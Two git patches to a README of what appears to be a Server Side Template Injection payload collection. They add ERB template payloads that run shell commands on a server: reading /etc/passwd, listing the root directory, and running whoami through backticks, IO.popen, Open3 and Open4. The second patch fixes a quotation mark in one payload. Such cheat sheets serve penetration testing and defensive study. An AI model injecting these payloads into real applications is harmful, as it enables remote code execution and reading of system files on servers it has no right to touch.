From 7670e2c36cd68663318aa2a7fd069e680f97097f Mon Sep 17 00:00:00 2001
From: meizjm3i <worker@go.com>
Date: Fri, 29 May 2020 12:28:55 +0800
Subject: [PATCH 1/2] Update ERB SSTI tips

---
 Server Side Template Injection/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 687a319..7c9956c 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine.
 
 ```ruby
 <%= system('cat /etc/passwd') %>
+<%= `ls /` %>
+<%= IO.popen('ls /').readlines()  %>
+<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
+<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```
+
+
 Execute code using SSTI for Slim engine.
 
 ```powershell

From a987b8be9faa800085c73d4b843c6b1405cd045a Mon Sep 17 00:00:00 2001
From: meizjm3i <worker@go.com>
Date: Fri, 29 May 2020 18:35:22 +0800
Subject: [PATCH 2/2] corrected a single quotation mark closure error

---
 Server Side Template Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 7c9956c..eb78c9d 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -97,7 +97,7 @@ Execute code using SSTI for ERB engine.
 <%= system('cat /etc/passwd') %>
 <%= `ls /` %>
 <%= IO.popen('ls /').readlines()  %>
-<% require 'open3’ %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
+<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```